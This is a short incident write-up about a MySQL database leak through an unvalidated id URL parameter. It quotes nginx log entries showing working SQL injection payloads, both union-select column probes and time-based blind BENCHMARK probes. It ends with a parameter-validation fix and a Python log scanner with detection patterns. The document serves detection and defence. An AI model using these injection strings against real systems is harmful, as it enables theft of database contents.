MySQL database information leak

Yesterday I discovered that someone had used a vulnerability in one of the system's programs to obtain the database's contents, and had then used the system's back-end login account to log in.

The cause of the problem was that one URL in the system had an unfiltered-parameter vulnerability, which let someone use that URL, e.g. http://daomain/a.php?xxxxxxxxx&id=23, together with the Havij tool to obtain the database information. The unfiltered parameter was id; the program did no validation on it.

How the problem was located: analysing the nginx log, I found a large number of entries like the following, where xxxxxxxxxxx&id= is my normal parameter:

xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D117%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D116%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3D117%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C109%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D114%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D120%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D119%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C91%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C97%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C100%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3D102%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3D101%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C109%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D114%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D113%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C124%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C126%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3D127%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3D126%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29

Solution:

Validated the parameters of the normal URL, and the problem was resolved.
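Added example (not code from the original post): a Python triage script that applies the same allow-list check the fix describes (id must be a positive integer) to constructed nginx access-log lines shaped like the entries above, and labels the two probe patterns they show. The sample log lines, the IP addresses and the regexes are assumptions for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed nginx access-log lines (combined format). The request targets mirror
# the three kinds of request seen in the post: a normal id, a column-count probe
# (union all select ...) and a time-based blind probe (if(... BENCHMARK ...)).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2014:10:00:01 +0800] "GET /a.php?xxxxxxxxxxx&id=23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2014:10:00:02 +0800] "GET /a.php?xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2014:10:00:03 +0800] "GET /a.php?xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# The only shape a legitimate id has in this application: a positive integer.
# This is the allow-list check the fix applies server-side before the value reaches
# the query; anything else is rejected outright rather than "cleaned".
ID_RE = re.compile(r"[1-9][0-9]{0,9}")

UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
TIME_RE = re.compile(r"\b(benchmark|sleep)\s*\(", re.I)

def is_valid_id(value: str) -> bool:
    return ID_RE.fullmatch(value) is not None

def classify_id(decoded: str) -> str:
    """Label one decoded id value. Valid ids pass; everything else is flagged."""
    if is_valid_id(decoded):
        return "ok"
    if UNION_RE.search(decoded):
        return "union-select probe"
    if TIME_RE.search(decoded):
        return "time-based blind probe"
    return "malformed id"

def scan_log(text: str) -> list:
    """Parse each access-log line, pull out the id parameter and classify it."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes and turns '+' into spaces, so we see what MySQL saw
        raw_id = parse_qs(query, keep_blank_values=True).get("id", [""])[0]
        verdict = classify_id(raw_id)
        if verdict != "ok":
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "id": raw_id, "verdict": verdict})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['verdict']}: id={f['id']!r}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; the per-IP timestamps of flagged lines give the timeline of the probing.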

For the principle behind how the database information was obtained, see http://blog.sina.com.cn/s/blog_5ded2e5b01010lkx.html
